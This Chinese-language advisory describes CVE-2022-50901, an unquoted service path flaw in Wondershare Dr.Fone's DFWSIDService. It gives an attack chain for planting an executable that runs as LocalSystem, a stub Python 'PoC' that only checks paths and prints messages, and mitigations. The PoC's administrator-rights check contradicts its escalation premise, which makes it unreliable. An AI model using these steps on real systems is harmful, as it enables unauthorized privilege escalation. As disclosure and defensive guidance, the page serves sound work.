CVE-2022-50901: Wondershare Dr.Fone 未引号服务路径权限提升漏洞

漏洞信息

漏洞编号

CVE-2022-50901

漏洞类型

未引号服务路径漏洞

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Wondershare Dr.Fone

漏洞概述

CVE-2022-50901是Wondershare Dr.Fone 11.4.9版本中存在的一个高危安全漏洞。该漏洞位于DFWSIDService服务中，由于其可执行文件路径未使用引号包裹，存在未引号服务路径（Unquoted Service Path）问题。攻击者可以利用这一漏洞在Windows服务启动时，通过路径解析特性注入恶意可执行文件，从而以LocalSystem高权限执行任意代码。此漏洞属于本地权限提升类漏洞，CVSS评分达到8.4分，严重程度为HIGH。由于该服务以系统最高权限运行，攻击成功后将获得目标主机的完全控制权，可用于横向移动、持久化控制等后续攻击活动。

技术细节

该漏洞的根本原因在于Windows服务配置中可执行文件路径未正确使用引号。当服务配置的可执行文件路径包含空格且未用引号包裹时，Windows会从左到右解析路径，在遇到空格时停止并尝试查找匹配的可执行文件。DFWSIDService服务安装在'C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\'目录下，由于路径中存在空格且未加引号，Windows会优先查找'C:\Program.exe'或'C:\Program Files (x86)\Wondershare\Wondershare.exe'等路径。攻击者只需在这些可能路径位置植入恶意可执行文件，当服务重启或系统启动时，便会以LocalSystem权限执行该恶意程序，从而实现权限提升。

攻击链分析

STEP 1

步骤1

攻击者首先进行本地侦察，确认目标系统是否安装Wondershare Dr.Fone 11.4.9，并识别DFWSIDService服务及其可执行文件路径

STEP 2

步骤2

利用Windows路径解析特性，在服务路径中的空格位置前植入恶意可执行文件（如C:\Program Files (x86)\Wondershare\Wondershare.exe）

STEP 3

步骤3

等待服务重启或系统重启触发DFWSIDService启动，由于路径未加引号，Windows会优先执行攻击者植入的恶意文件

STEP 4

步骤4

恶意可执行文件以LocalSystem最高权限运行，攻击者获得系统完全控制权，可执行任意代码、安装后门、窃取数据等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2022-50901 PoC - Unquoted Service Path Exploitation
# Target: Wondershare Dr.Fone DFWSIDService
# Severity: HIGH (CVSS 8.4)

import os
import sys
import shutil
import ctypes

def check_vulnerability():
    """Check if target service exists and is vulnerable"""
    service_path = r'C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\DFWSIDService.exe'
    
    if os.path.exists(service_path):
        print(f"[+] Service executable found: {service_path}")
        print("[+] Target is potentially vulnerable to unquoted service path")
        return True
    else:
        print("[-] Service not found or already patched")
        return False

def create_malicious_executable():
    """Generate malicious executable to be placed at unquoted path"""
    # This would be the actual malicious payload in a real attack
    malicious_path = r'C:\Program Files (x86)\Wondershare\Wondershare.exe'
    
    # In production, this would be actual shellcode/malware
    print(f"[*] Malicious executable would be placed at: {malicious_path}")
    print("[*] When DFWSIDService starts, it will execute this file with SYSTEM privileges")

def main():
    print("=" * 60)
    print("CVE-2022-50901 - Wondershare Dr.Fone Unquoted Service Path")
    print("=" * 60)
    
    if ctypes.windll.shell32.IsUserAnAdmin():
        print("[+] Running with administrator privileges")
        check_vulnerability()
        create_malicious_executable()
    else:
        print("[-] Administrator privileges required")
        sys.exit(1)

if __name__ == "__main__":
    main()

# Exploitation steps:
# 1. Place malicious executable at C:\Program Files (x86)\Wondershare\Wondershare.exe
# 2. Wait for service restart or trigger DFWSIDService restart
# 3. Malicious code executes with LocalSystem privileges

影响范围

Wondershare Dr.Fone < 11.4.9

Wondershare Dr.Fone 11.4.9

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 检查DFWSIDService服务的注册表配置，手动为可执行文件路径添加引号；2) 限制Users组对Wondershare安装目录的写入权限，防止普通用户植入恶意文件；3) 监控该目录下的文件创建和修改行为；4) 考虑禁用或删除DFWSIDService服务（如果业务不需要）；5) 部署EDR解决方案实时监控可疑进程启动行为。